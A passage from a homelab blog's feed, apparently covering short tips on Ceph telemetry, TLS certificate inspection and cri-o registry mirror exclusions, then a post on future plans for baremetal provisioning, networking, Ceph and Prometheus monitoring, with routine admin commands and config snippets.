<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>alias kceph<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;kubectl rook-ceph --operator-namespace rook-ceph -n rook-cluster&#34;</span>
</span></span></code></pre></div><h2 id="ceph-telemetry">Ceph telemetry</h2>
<p>Like so many projects these days, Ceph also has a <a href="https://docs.ceph.com/en/latest/mgr/telemetry/">telemetry function</a>.
It is opt-in, and the only bad thing I could say about it is that the project
asks you to enable it from time to time. I&rsquo;ve got it enabled. I&rsquo;ve always felt
that data sharing is a good way to help out a project.</p>
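<p>For anyone who wants to turn it on as well, it&rsquo;s a couple of ceph commands; the
preview lets you inspect exactly what would be reported before opting in. A sketch,
with the flags as I remember them, so double-check against the telemetry docs:</p>
<pre tabindex="0"><code>ceph telemetry preview-all
ceph telemetry on --license sharing-1-0
ceph telemetry show
</code></pre>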
<p>But Ceph goes one step further. They also share some of the data in public
dashboards you can find <a href="https://telemetry-public.ceph.com/">here</a>.</p>
<p>The dashboard shows some general information, like the fact that there are about
3.5k Ceph clusters with telemetry enabled, which have a combined capacity of 1.73 EiB.
It also shows that an average cluster has about 16 - 32 TiB of storage and
has a mere 4 OSDs. I&rsquo;m wondering whether that&rsquo;s skewed by e.g. Proxmox clusters?</p>
<h2 id="showing-information-from-tls-certs-on-the-command-line">Showing information from TLS certs on the command line</h2>
<p>This one always comes up when I&rsquo;m updating my Let&rsquo;s Encrypt certs. I just want
to have a quick look at my webservers to make sure they&rsquo;ve all updated to the
new certificate correctly.</p>
<p>The command, using my blog as an example, looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>$ openssl s_client -connect blog.mei-home.net:443 2&gt;&amp;<span style="color:#ae81ff">1</span> | openssl x509 -text -noout
</span></span><span style="display:flex;"><span>Certificate:
</span></span><span style="display:flex;"><span>    Data:
</span></span><span style="display:flex;"><span>        Version: <span style="color:#ae81ff">3</span> <span style="color:#f92672">(</span>0x2<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>        Serial Number:
</span></span><span style="display:flex;"><span>            05:22:36:ee:6e:19:df:56:0a:ee:66:44:a3:fc:a3:00:8c:d7
</span></span><span style="display:flex;"><span>        Signature Algorithm: ecdsa-with-SHA384
</span></span><span style="display:flex;"><span>        Issuer: C<span style="color:#f92672">=</span>US, O<span style="color:#f92672">=</span>Let<span style="color:#960050;background-color:#1e0010">&#39;</span>s Encrypt, CN<span style="color:#f92672">=</span>E5
</span></span><span style="display:flex;"><span>        Validity
</span></span><span style="display:flex;"><span>            Not Before: Apr  <span style="color:#ae81ff">7</span> 08:53:40 <span style="color:#ae81ff">2025</span> GMT
</span></span><span style="display:flex;"><span>            Not After : Jul  <span style="color:#ae81ff">6</span> 08:53:39 <span style="color:#ae81ff">2025</span> GMT
</span></span><span style="display:flex;"><span>        Subject: CN<span style="color:#f92672">=</span>mei-home.net
</span></span><span style="display:flex;"><span>        Subject Public Key Info:
</span></span><span style="display:flex;"><span>            Public Key Algorithm: id-ecPublicKey
</span></span><span style="display:flex;"><span>                Public-Key: <span style="color:#f92672">(</span><span style="color:#ae81ff">384</span> bit<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>                pub:
</span></span><span style="display:flex;"><span>                    04:6c:97:b7:bb:b1:26:cf:2f:c9:c8:14:65:a2:46:
</span></span><span style="display:flex;"><span>                    b6:4c:ab:a4:ea:47:57:29:cd:d4:3b:de:11:43:5d:
</span></span><span style="display:flex;"><span>                    69:a7:9f:be:50:50:81:41:b6:f6:97:a7:35:3a:13:
</span></span><span style="display:flex;"><span>                    4b:d1:a1:31:84:d0:e6:62:82:47:1f:97:d7:5d:ef:
</span></span><span style="display:flex;"><span>                    05:1d:5e:42:0d:f1:19:17:9f:59:d0:89:a3:ca:78:
</span></span><span style="display:flex;"><span>                    8a:d7:ed:a2:9f:d7:9c:32:15:92:f8:6d:ef:5a:7d:
</span></span><span style="display:flex;"><span>                    20:07:b8:c3:67:30:31
</span></span><span style="display:flex;"><span>                ASN1 OID: secp384r1
</span></span><span style="display:flex;"><span>                NIST CURVE: P-384
</span></span><span style="display:flex;"><span>        X509v3 extensions:
</span></span><span style="display:flex;"><span>            X509v3 Key Usage: critical
</span></span><span style="display:flex;"><span>                Digital Signature
</span></span><span style="display:flex;"><span>            X509v3 Extended Key Usage:
</span></span><span style="display:flex;"><span>                TLS Web Server Authentication, TLS Web Client Authentication
</span></span><span style="display:flex;"><span>            X509v3 Basic Constraints: critical
</span></span><span style="display:flex;"><span>                CA:FALSE
</span></span><span style="display:flex;"><span>            X509v3 Subject Key Identifier:
</span></span><span style="display:flex;"><span>                43:C0:F9:C3:C5:10:E4:F0:A5:68:AC:82:8E:7E:B4:D7:74:90:46:29
</span></span><span style="display:flex;"><span>            X509v3 Authority Key Identifier:
</span></span><span style="display:flex;"><span>                9F:2B:5F:CF:3C:21:4F:9D:04:B7:ED:2B:2C:C4:C6:70:8B:D2:D7:0D
</span></span><span style="display:flex;"><span>            Authority Information Access:
</span></span><span style="display:flex;"><span>                OCSP - URI:http://e5.o.lencr.org
</span></span><span style="display:flex;"><span>                CA Issuers - URI:http://e5.i.lencr.org/
</span></span><span style="display:flex;"><span>            X509v3 Subject Alternative Name:
</span></span><span style="display:flex;"><span>                DNS:*.mei-home.net, DNS:mei-home.net
</span></span><span style="display:flex;"><span>            X509v3 Certificate Policies:
</span></span><span style="display:flex;"><span>                Policy: 2.23.140.1.2.1
</span></span><span style="display:flex;"><span>            X509v3 CRL Distribution Points:
</span></span><span style="display:flex;"><span>                Full Name:
</span></span><span style="display:flex;"><span>                  URI:http://e5.c.lencr.org/88.crl
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>            CT Precertificate SCTs:
</span></span><span style="display:flex;"><span>                Signed Certificate Timestamp:
</span></span><span style="display:flex;"><span>                    Version   : v1 <span style="color:#f92672">(</span>0x0<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>                    Log ID    : CC:FB:0F:6A:85:71:09:65:FE:95:9B:53:CE:E9:B2:7C:
</span></span><span style="display:flex;"><span>                                22:E9:85:5C:0D:97:8D:B6:A9:7E:54:C0:FE:4C:0D:B0
</span></span><span style="display:flex;"><span>                    Timestamp : Apr  <span style="color:#ae81ff">7</span> 09:52:10.214 <span style="color:#ae81ff">2025</span> GMT
</span></span><span style="display:flex;"><span>                    Extensions: none
</span></span><span style="display:flex;"><span>                    Signature : ecdsa-with-SHA256
</span></span><span style="display:flex;"><span>                                30:45:02:20:47:88:12:84:60:3F:FB:62:7F:4C:A8:05:
</span></span><span style="display:flex;"><span>                                23:18:C5:25:66:1F:9A:13:58:8E:AD:94:DB:34:9E:C9:
</span></span><span style="display:flex;"><span>                                9D:F8:A2:07:02:21:00:83:76:32:B0:F7:34:11:B1:BB:
</span></span><span style="display:flex;"><span>                                EC:6A:2D:8C:B1:47:E6:93:DC:FE:31:3E:53:AE:67:47:
</span></span><span style="display:flex;"><span>                                08:B4:A3:38:5A:56:A0
</span></span><span style="display:flex;"><span>                Signed Certificate Timestamp:
</span></span><span style="display:flex;"><span>                    Version   : v1 <span style="color:#f92672">(</span>0x0<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>                    Log ID    : DD:DC:CA:34:95:D7:E1:16:05:E7:95:32:FA:C7:9F:F8:
</span></span><span style="display:flex;"><span>                                3D:1C:50:DF:DB:00:3A:14:12:76:0A:2C:AC:BB:C8:2A
</span></span><span style="display:flex;"><span>                    Timestamp : Apr  <span style="color:#ae81ff">7</span> 09:52:12.253 <span style="color:#ae81ff">2025</span> GMT
</span></span><span style="display:flex;"><span>                    Extensions: none
</span></span><span style="display:flex;"><span>                    Signature : ecdsa-with-SHA256
</span></span><span style="display:flex;"><span>                                30:44:02:20:03:29:9E:A8:29:43:3B:A9:44:EE:DB:60:
</span></span><span style="display:flex;"><span>                                70:E0:4A:9C:DB:DD:0C:9F:20:7D:7F:FB:DA:AF:90:FD:
</span></span><span style="display:flex;"><span>                                4E:EB:59:31:02:20:5B:84:2C:BC:05:A7:53:A4:EB:04:
</span></span><span style="display:flex;"><span>                                59:A4:7B:77:0E:5A:90:39:1B:68:BF:48:71:14:E5:16:
</span></span><span style="display:flex;"><span>                                72:42:89:55:76:95
</span></span><span style="display:flex;"><span>    Signature Algorithm: ecdsa-with-SHA384
</span></span><span style="display:flex;"><span>    Signature Value:
</span></span><span style="display:flex;"><span>        30:65:02:31:00:87:c9:85:13:1f:f7:b1:0a:d0:2d:0c:56:7f:
</span></span><span style="display:flex;"><span>        bd:1e:f5:51:2b:31:59:62:03:ee:bf:ca:fc:3f:09:b0:e4:e2:
</span></span><span style="display:flex;"><span>        74:80:aa:16:ac:1b:bf:17:38:3a:3a:22:6a:70:4c:57:e3:02:
</span></span><span style="display:flex;"><span>        30:1e:73:29:b1:e4:c4:43:a5:d8:bd:8f:81:a6:23:c6:10:b3:
</span></span><span style="display:flex;"><span>        cc:b0:3f:31:8b:86:f3:51:76:c8:85:b4:37:a2:be:96:e0:83:
</span></span><span style="display:flex;"><span>        61:65:cb:b8:6a:cd:d8:56:d7:7b:f4:a4:83
</span></span></code></pre></div><h2 id="excluding-containers-from-pull-through-cache-in-cri-o">Excluding containers from pull-through cache in cri-o</h2>
<p>I wrote about migrating to <a href="https://goharbor.io/">Harbor</a> during my k8s migration,
and about the fact that <a href="https://cri-o.io/">cri-o</a> supports pull-through caches
for any registry <a href="https://blog.mei-home.net/posts/k8s-migration-11-harbor/">in the past</a>.</p>
<p>I&rsquo;d like to provide a short update on that setup, namely on the pull-through cache
part. Because there&rsquo;s one tiny problem with setting Harbor up as a generic
pull-through cache: Harbor itself. What if an important Harbor component gets
migrated during a node restart? And the Harbor images aren&rsquo;t available on the
new node - but Harbor is already down, so the cache doesn&rsquo;t work?</p>
<p>Well, first of all, cri-o of course keeps working: if the cache is unavailable,
the original registry is tried. But this seems to depend on what exactly is
broken. Namely, I ran into issues with my Dockerhub mirror, which runs through a
Caddy proxy. I described the reason in the blog post I linked above.</p>
<p>Well, luckily the cri-o team thought of that, and you can prevent specific
repositories from using the cache altogether. So now my config for DockerHub
looks like this:</p>
<pre tabindex="0"><code class="language-conf" data-lang="conf">[[registry]]
prefix = &#34;docker.io&#34;
insecure = false
blocked = false
location = &#34;docker.io&#34;
[[registry.mirror]]
location = &#34;internal.example.com/dockerhub-cache&#34;
[[registry]]
prefix = &#34;docker.io/goharbor&#34;
location = &#34;docker.io/goharbor&#34;
[[registry]]
prefix = &#34;docker.io/caddy&#34;
location = &#34;docker.io/caddy&#34;
</code></pre><p>This configuration redirects all DockerHub image pulls to my internal Harbor
instance by default. But specifically for Harbor&rsquo;s own images and for Caddy,
the redirection is overridden to point back to DockerHub.
With this config I can be sure that Harbor itself can always pull its own images.</p>
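<p>For completeness, a hedged sketch rather than a recipe: this kind of override usually
lives in <code>/etc/containers/registries.conf</code> or in a drop-in below
<code>/etc/containers/registries.conf.d/</code>, and cri-o should pick up registry changes on a
reload; if in doubt, a restart definitely does the trick:</p>
<pre tabindex="0"><code>sudoedit /etc/containers/registries.conf.d/99-harbor-exceptions.conf
sudo systemctl reload crio
</code></pre>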
<p>And that&rsquo;s already it for my first Sammelsurium post. I think this is a good format
for providing some short information I&rsquo;d like to put somewhere more permanent,
but don&rsquo;t want to write a full blog post about.</p>
]]></content:encoded>
    </item>
    <item>
      <title>What&#39;s next after the K8s Migration?</title>
      <link>https://blog.mei-home.net/posts/whats-next-after-k8s-migration/</link>
      <pubDate>Tue, 29 Apr 2025 22:00:30 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/whats-next-after-k8s-migration/</guid>
      <description>A meandering stream of thought about future Homelab projects</description>
      <content:encoded><![CDATA[<p>Wherein I go over my future plans for the Homelab, now that the k8s migration
is finally done.</p>
<p>So it&rsquo;s done. The <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration</a> is finally
complete, and I can now get started with some other projects. Or, well, I can
once I&rsquo;ve updated my control plane Pis to Pi 5 with NVMe SSDs.</p>
<p>But what to do then? As it turns out, I&rsquo;ve got a very full backlog. I&rsquo;m decidedly
not in danger of boredom.</p>
<p>Without further ado, here is a meandering tour through my Homelab project list.</p>
<h2 id="baremetal-improvements">Baremetal improvements</h2>
<p>At the moment, all of the hosts in my Homelab are running baremetal, I do not
have any VMs. I&rsquo;ve got both, x86 hosts and a lot of Pis. I&rsquo;ve also got hosts with
and without local storage. And their management, especially the creation of new
hosts, is not great at the moment.</p>
<p>In short, I&rsquo;m taking the current Ubuntu LTS and adapting the image for every single
host. I&rsquo;m using HashiCorp&rsquo;s <a href="https://developer.hashicorp.com/packer">packer</a>
for the generation of the images. This generation varies wildly between x86
and Pi hosts. For the x86 hosts, Packer runs the full Ubuntu installer in a Qemu VM, just in
an automated way. For the Pis, I&rsquo;m taking the preinstalled Ubuntu Pi images.
In both cases I then apply an Ansible playbook which installs basic necessities,
especially my management user with its SSH key and some preconditions for
Ansible usage. Importantly, this playbook also configures the host name. So I
need to generate a fresh image for every new host, even though the only difference
is the Linux hostname config.</p>
<p>What happens next depends on whether the host is netbooted or not. For netbooters,
I put the new image onto a Ceph RBD to serve as the host&rsquo;s root disk and extract
the boot partition to the NFS share used to mount the boot content to the hosts
themselves and my netboot control host, which runs dnsmasq to make the files available
to the netbooters.
For hosts with local storage, the approach is to stick in a USB stick, boot
the host, mount an NFS share with the freshly generated image, and then <code>dd</code> that
image onto the local disk.</p>
<p>All of the above is not really great, to be honest. There are a number of manual
steps in there. The first thing I&rsquo;d like to somehow solve is the &ldquo;one image per host&rdquo;.
That&rsquo;s only there because I need to provide the hostname in the image so it gets
the right one at first boot.
But that shouldn&rsquo;t be necessary. I should really only need two images,
one for Pis and one for x86 machines. And then I should do all the necessary
config via <a href="https://cloud-init.io/">Cloud-init</a>. This might even include some
parts of the config I&rsquo;m currently doing via the Ansible playbook. For example,
the creation of my management/Ansible user should also be possible with cloud-init.</p>
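<p>As a sketch of what that could look like (nothing I&rsquo;m actually running yet, and all
names are placeholders), a per-host user-data file could carry both the hostname and
the management user:</p>
<pre tabindex="0"><code>#cloud-config
hostname: k8s-cp-01
users:
  - name: mgmt
    groups: sudo
    shell: /bin/bash
    sudo: ALL=(ALL) NOPASSWD:ALL
    ssh_authorized_keys:
      - ssh-ed25519 AAAA... mgmt@workstation
</code></pre>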
<p>But even if that works, there&rsquo;s still the actual install of the image on the
host, be it netbooted or local storage. And for this, I&rsquo;ve been eyeing two
tools for quite a while: <a href="https://tinkerbell.org/">tinkerbell</a> and Canonical&rsquo;s
<a href="https://maas.io/">MaaS (Metal as a Service)</a>. Both of those offer some kind of
management for baremetal machines, making use of DHCP and netboot. With this,
I&rsquo;d like to move my hosts a bit more in the direction of cattle.</p>
<p>Both Tinkerbell and MaaS are capable of automatically installing baremetal machines.
There are two issues with that when it comes to my setup, both related to my netbooters.
First, the Raspberry Pis. Those have a &ldquo;bespoke&rdquo; netboot process that doesn&rsquo;t
really follow any standards. But both MaaS and Tinkerbell rely on a certain
pre-boot environment. And the Raspberry Pi can work with both - <em>if</em> you have
an SD card to provide separate bootcode. In principle, you need to UEFI boot the
Pi. And that, as said, works fine. But from everything I&rsquo;ve read up to now,
that approach always requires an SD card or some other local storage to work.
It doesn&rsquo;t work via the Pi&rsquo;s netboot process.
But then again - there&rsquo;s a lot of open source stuff even way down in the Pi&rsquo;s
boot process. And I think it could be very interesting to get really deeply into
the weeds here and implement an adapted Pi firmware myself. That would be a
really large project, because I&rsquo;ve got pretty much no idea about development
that close to the metal. But it could be really interesting.</p>
<p>The second problem is with the root disk on my netbooting hosts. They&rsquo;re Ceph RBDs,
and I had to implement some special scripting in the initramfs to make those work
as root disks. And I doubt that whatever OS install mechanisms Tinkerbell and
MaaS support can actually handle Ceph RBDs as the install target. But that&rsquo;s
another thing to check. Both tools are open source, so perhaps I can hack
something together.</p>
<p>With all of this, I might even make some proper contributions to open source
again, if what I come up with is actually fit for wider consumption.</p>
<p>For all of this to work, I will also need some sort of separate host, because
I don&rsquo;t think running the tools responsible for host definitions and configuration
on the very k8s cluster that runs on those managed hosts is a great idea.
For stuff like that which should not rely on any other services in the Homelab,
I&rsquo;ve already got a host, what I call my &ldquo;cluster master&rdquo;. It&rsquo;s a Pi 4 and
currently runs my PowerDNS server and dnsmasq for supporting the netbooting
hosts. But that&rsquo;s only a 4GB Pi 4, so I can&rsquo;t run too much on there. But with
MaaS or Tinkerbell, I&rsquo;d rather not run them just in Docker containers or even
baremetal. Instead, I&rsquo;d like to set up a small management k8s cluster. I will
use that to also test some of the lighter/smaller k8s distributions, like
k3s. It will definitely be a single node cluster.</p>
<p>In addition to running Tinkerbell or MaaS on that cluster, I&rsquo;d also like to get
into Cluster API and ultimately see how I like <a href="https://www.talos.dev/">Talos Linux</a>.
I initially bounced off of it due to not allowing SSH access to the host, but
now that the number of things actually running baremetal is even smaller than
before, I&rsquo;m warming to the idea. And it&rsquo;s supposedly supporting Pi 4 already,
and they&rsquo;re working on Pi 5 support, from what I understand. So that could be
really nice to look at.</p>
<p>Furthermore, I&rsquo;ve also been looking at GitOps for the cluster with Flux or Argo,
and both would need some sort of management cluster as well.</p>
<p>So I&rsquo;ve got a lot of things to work on for the baremetal/hardware side of the
Homelab. One important thing I also need to do is to look into whether I want
to continue with the Pi fleet. The advantage is that I&rsquo;m getting a lot of
physical hosts with a relatively small physical footprint and very low
electricity consumption.
But this also comes with downsides. One I&rsquo;ve already mentioned above: Pis don&rsquo;t
always do things the standard way. They also don&rsquo;t have much expandability.
The standard advice today is to get some small form factor thin client from
Dell, Lenovo or HP from the used market. They have a similar expandability
problem, but at least they&rsquo;d have a more standardized boot process, and I
wouldn&rsquo;t need to worry about whether a given OS supports them - they&rsquo;re just
UEFI machines. But they&rsquo;re also 10x the size of a Pi 4. They also aren&rsquo;t passively
cooled, like all my Pis are. And my rack is sitting right next to my desk in my
living room. If I go this route, I will have to look for models which support me
putting in some nice Noctua instead of using whatever is already in there.
Following this path, I&rsquo;d probably put LXD (or rather, Incus) on the machines and
run everything in VMs, again using Ceph RBDs as their root disks, so that the
internal NVMe would only need to hold the underlying host system.</p>
<p>I&rsquo;m honestly talking myself into going that route right now. What&rsquo;s enticing
me the most is honestly the return to something &ldquo;standard&rdquo;. That&rsquo;s really
tempting. Not having to think about whether my underlying machines can even
support what I want to do with them would be nice.</p>
<p>But then again: The Pi 4 are still good. Sure, I have to replace the control
plane Pi 4 with Pi 5, but the worker nodes are still trucking along. And I would
guess that they will keep working for my needs for another couple of years, at
minimum. Replacing them now, and just for the reason that I&rsquo;d like to have
something more standardized, would be a massive waste.</p>
<h2 id="networking">Networking</h2>
<p>This is a really big one. At the moment, my entire network is 1 GbE. I&rsquo;ve got
a couple of hosts with 2.5 GbE cards, but all of my network infra is still only
1 GbE. I&rsquo;d like to change that. There&rsquo;s really nothing to be done with the Pis,
they&rsquo;re going to stay at 1 GbE. But, and this is the main thing, I&rsquo;ve got my
OPNsense router and my Ceph hosts as well as my desktop. It would be nice to have
the Ceph hosts at 2.5 GbE or even more, so they could supply several 1 GbE
connected devices at their full speed.</p>
<p>So some new hardware will be in order. Preferably, I&rsquo;d like to have a switch
with mostly 1GbE ports. Though I&rsquo;d also be happy with 1/2.5 GbE combo ports. But
for some reason, 1 GbE/2.5 GbE ports don&rsquo;t seem to be widespread? I still remember
that 10/100/1000 ports were definitely a thing for a long time. I will then instead
be looking for two switches, most likely. One with enough 1 GbE ports for my Pis
and enough highspeed uplinks to connect to a second 2.5 GbE switch, perhaps
even more. I&rsquo;ve still got a lot of free PCIe slots in my Ceph machines for a
faster network card.
I&rsquo;m currently eyeing MikroTik for all my future networking hardware needs,
mostly to buy from an EU manufacturer.</p>
<p>Another network appliance I&rsquo;d like to upgrade is my current router. It has more
than enough performance, and the advantage of being quiet. But it&rsquo;s also a mini
PC, with the accompanying lack of expandability. It only has 1 GbE ports, so
even if I upgrade the switches, the connection to the router would still be a
significant bottleneck. For a replacement, I&rsquo;d love something 1U I can mount
into my rack. The main issue is of course the &ldquo;1U&rdquo; wish - because that, almost
invariably, comes with fans. And small diameter fans at that. And as I&rsquo;ve said
above, the rack is sitting next to my desk, so a bit of quiet is appreciated.
I&rsquo;d like to look at the machines that OPNsense themselves offer, as the smaller
ones are looking pretty sweet. Or I could go and see whether anyone has made a
1U machine which is passively cooled. I mean, even 1U in a rack should provide
enough volume to put in enough metal to cool something reasonable in a passive
setup. But yeah, without that, I will likely give a bit of money to OPNsense
for one of their HW offerings.
Hm, just while doing my final read through the post, I&rsquo;m thinking that I
might not necessarily need to replace my router HW. It has six 1 GbE ports.
And I&rsquo;m only using two of them at the moment. Why not just look into combining
them? Sure, it would take up more ports in my future switch, but that might be
acceptable, if it means I can keep using the HW for longer.</p>
<p>Then there is another big elephant in the room - IPv6. I&rsquo;m currently reading
<a href="https://nostarch.com/tcpip.htm">The TCP/IP Guide</a>, and honestly, IPv6 sounds
pretty interesting. And at this point at least, most hardware and software I&rsquo;m
using should be perfectly fine with it.</p>
<p>And finally, I&rsquo;d like to fix two issues I&rsquo;ve currently got with my networking
setup. The first one has to do with using Cilium&rsquo;s LoadBalancer support via BGP.
It allows me to use LoadBalancer functionality in my cluster, and it does so via
publishing routes to virtual IPs pointing at the hosts running the service.
There&rsquo;s just one issue with that: If anything in the Homelab subnet needs to
access one of those LoadBalancer services, I end up with asymmetric routing.
The packets coming from the requesting host go up to the router, because the
LoadBalancer IPs are all in a separate subnet, so they need routing from the
Homelab subnet. But when the Pods send answers, those are not routed back via
the same path. Those packets are sent via the k8s host&rsquo;s interface, because
that&rsquo;s directly connected to the Homelab network.
The main issue this introduces is for the stateful firewall I&rsquo;ve got running
on the router. Here, it&rsquo;s problematic that the router only sees one piece of
the initial TCP connection, but not the other side. By default, pf does not
consider that a valid connection, so it will block packets trying to flow along
it.
I had to configure &ldquo;sloppy state&rdquo; for those firewall rules, which made it work,
but it&rsquo;s still not great, because the first few packets flowing along the
path still get blocked.</p>
<p>The second issue is about my external DNS. It is currently hosted with my domain
registrar, Strato. Which is fine, there&rsquo;s only one issue I have with Strato: It
doesn&rsquo;t offer any sort of API for its DNS, besides some DynDNS support. So
some things, like the DNS challenge to get a wildcard cert from Let&rsquo;s Encrypt,
need manual intervention. Whenever I need to get a new cert, I need to log into
the Web UI to change the TXT records with the new challenge values. And I&rsquo;d
like to fully automate that.
One option is <a href="https://donotsta.re/users/dns">ServFail</a>. A DNS network with a
bash based Web UI is right down my alley. But before I can do that, I will have
to fix my mail delivery, because I currently depend on Strato&rsquo;s mail package,
which in turn depends on your DNS being hosted by them - or you entering the
correct data into your own DNS server.</p>
<h2 id="mail">Mail</h2>
<p>Speaking of mail, that is another big one I&rsquo;d like to tackle at some point.
Even though it&rsquo;s currently pretty far down the list. I did buy Michael W Lucas'
<a href="https://www.tiltedwindmillpress.com/product/ryoms/">Run Your Own Mail Server</a>
a little while ago and plan to use it to set up my very own. Let&rsquo;s see whether
it&rsquo;s really as simple as some people claim.</p>
<p>One important thing I need to do first though: Organizing a static IP.</p>
<h2 id="remote-vps-as-an-entrypoint-to-the-homelab">Remote VPS as an entrypoint to the Homelab</h2>
<p>At the moment, the entire Homelab actually runs at home. The DNS for this
blog and other public things I host points to my Deutsche Telekom consumer
VDSL connection. This has been working fine for all these years, but some things
require a static IP. Especially the aforementioned self-hosted mail server.
I&rsquo;m reasonably sure mail sent from a residential IP will be blocked immediately.
I&rsquo;d then do the typical thing and create a WireGuard tunnel between that VPS and
my Homelab. One other thing I plan to use that VPS for is to get an outside
monitoring tool going, so I can actually get some indication of what&rsquo;s going
on when the Homelab completely crashes. Right now, my Gatus monitoring is running
in the k8s cluster it&rsquo;s monitoring. &#x1f605;</p>
<h2 id="ceph">Ceph</h2>
<p>Next up is Ceph. As I&rsquo;ve described in <a href="https://blog.mei-home.net/posts/ceph-copy-latency/">one of my previous posts</a>,
one of my HDDs regularly displays an appallingly low IOPS value. I need to
figure out whether it&rsquo;s actually bad or whether there is something else wrong.
But for that, I need to understand Ceph better. A lot better. There was also
some weird behavior when I was moving around hosts after taking down the
baremetal Ceph cluster, where the mClock scheduler was not using a disk&rsquo;s full
capacity while backfilling.</p>
<p>All of these I&rsquo;d like to investigate. For this, I will likely have to actually
read up on the algorithms behind Ceph, including the papers on CRUSH for
example. And then I might even dig into the code, because while the Ceph docs
themselves are pretty good, I&rsquo;d like to really understand what&rsquo;s happening behind
the curtain.</p>
<p>Related to the IOPS issues, I&rsquo;m also considering adding a SATA SSD to all of my
Ceph hosts to put the WAL and RocksDB on it, at least for the HDD OSDs. That
should improve overall performance for operations on my HDD pool, by relieving
each HDD of having to handle both the payload and the metadata IO.
The main issue with that is that one of my storage hosts is an
<a href="https://www.hardkernel.com/shop/odroid-h4/">Odroid H4</a>, and that only has two
SATA power and data connectors, both already in use. So that one would need to
be replaced by something else.</p>
<p>Finally, one of the things which has been annoying me for a while is the fact
that I&rsquo;m currently hardcoding the IPs for my Ceph MON daemons in several places.
Most importantly, in the Ceph configs for my netbooting hosts. That has the
effect that I can&rsquo;t easily move the MONs around. But it now looks like Rook added
functionality to put the MONs behind Kubernetes services. This would allow me
to move them without having to constantly update the configs and reboot hosts.
I still couldn&rsquo;t have them move around freely, because they&rsquo;re using the local
disk to store their data, but still, not having to worry about their IPs would
be nice.</p>
<h2 id="monitoring">Monitoring</h2>
<p>My beloved graphs. There are going to be more of them. But first, I need to
deploy Thanos for my Prometheus instance. Because that&rsquo;s currently got a 250GiB
persistent volume. And I will need to increase the size of that volume again
this week, as it&rsquo;s currently at 94% full. And no, I will not be contemplating
reducing my retention period below five years, thank you very much. &#x1f605;
Thanos will allow the Prometheus TSDB to consume the entirety of my HDD pool,
and I will finally be free from needing to regularly increase the size.</p>
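<p>A minimal sketch of what that setup might look like, assuming the TSDB blocks end up in an S3 bucket on the Ceph RGW. Bucket, endpoint and credentials are placeholders:</p>
<pre tabindex="0"><code># Object storage config consumed by the Thanos sidecar and store gateway.
cat &lt;&lt;EOF &gt; thanos-objstore.yaml
type: S3
config:
  bucket: thanos-metrics
  endpoint: rgw.example.internal:443
  access_key: PLACEHOLDER
  secret_key: PLACEHOLDER
EOF

# The sidecar runs next to Prometheus and ships finished TSDB blocks to the
# bucket, so the local volume only has to hold the most recent data.
thanos sidecar \
  --tsdb.path /prometheus \
  --prometheus.url http://localhost:9090 \
  --objstore.config-file thanos-objstore.yaml
</code></pre>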
<p>Once that&rsquo;s accomplished, I want to get into gathering metrics from apps. Right
now, I&rsquo;m only gathering host metrics as well as Ceph and k8s metrics, but that&rsquo;s
pretty much it. But there&rsquo;s a lot of apps running in the Homelab which also provide
metrics, and I&rsquo;d like to gather those too. And make pretty graphs of them. &#x1f913;</p>
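<p>With the Prometheus operator already in place, most of that should boil down to pointing a ServiceMonitor at whatever the app exposes. A generic sketch with made-up names, assuming the app serves metrics on <code>/metrics</code>:</p>
<pre tabindex="0"><code>kubectl apply -f - &lt;&lt;EOF
apiVersion: monitoring.coreos.com/v1
kind: ServiceMonitor
metadata:
  name: someapp
  namespace: someapp
spec:
  selector:
    matchLabels:
      app: someapp
  endpoints:
    - port: http
      path: /metrics
      interval: 60s
EOF
</code></pre>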
<p>One big one I&rsquo;d like to tackle is my blog. Right now, I&rsquo;ve got zero metrics there,
besides the number of requests hitting it as part of my generic web server
metrics gathering. But to be honest, I&rsquo;d like to know more. Purely for the
pretty graphs. I don&rsquo;t want to track anyone or anything like that. Just some
basic &ldquo;How often did this article get clicked&rdquo; graphs. So I might just go
with some log analysis. But I&rsquo;ve also been eyeing something like
<a href="https://plausible.io/">Plausible</a>. It&rsquo;s just because I really like a good
dashboard. &#x1f913;</p>
<p>And then there&rsquo;s the big elephant in my monitoring room. At the moment, I&rsquo;m
mostly seeing any issues when I&rsquo;m actively looking at my Homelab dashboard.
Or, you know, when I suddenly hear fans ramping up or HDDs start rattling like
mad. &#x1f605;
I&rsquo;d like to change that with some proper alerting. Perhaps even including
push notifications to <em>waves arms</em> somewhere. At least for the most important
stuff like SMART issues on my disks.</p>
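<p>As a starting point, a PrometheusRule along these lines would cover the disk case. It assumes a SMART exporter is deployed and exposes something like <code>smartctl_device_smart_status</code> - the exact metric name depends on the exporter:</p>
<pre tabindex="0"><code>kubectl apply -f - &lt;&lt;EOF
apiVersion: monitoring.coreos.com/v1
kind: PrometheusRule
metadata:
  name: disk-health
  namespace: monitoring
spec:
  groups:
    - name: smart
      rules:
        - alert: DiskSmartFailure
          # 1 means healthy, anything else warrants a look.
          expr: smartctl_device_smart_status != 1
          for: 15m
          labels:
            severity: critical
          annotations:
            summary: SMART reports a problem on one of the disks
EOF
</code></pre>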
<p>And finally, I&rsquo;ve been thinking about a public dashboard. Much reduced compared
to what I&rsquo;ve got internally, but perhaps just something like Pod CPU usage,
overall memory usage and stuff like that? I&rsquo;m wondering whether other Homelabbers
would be interested in something along those lines.</p>
<h2 id="the-k8s-cluster">The k8s cluster</h2>
<p>Only two short points here. One, I&rsquo;d like to get back into GitOps with Flux or
Argo. I explored it a bit in the past, but the fact that I&rsquo;d basically need
another cluster, or at least a separate Git forge/CI system, put me off. But
with the plan to run a single-node management cluster in the future, it might
be interesting to look at this again.</p>
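<p>For the Flux variant, the bootstrap against a plain Git remote is pretty compact. URL, branch and path here are placeholders for wherever the fleet repo would live on my Git forge:</p>
<pre tabindex="0"><code># Bootstrap Flux into the (future) management cluster from a generic Git remote.
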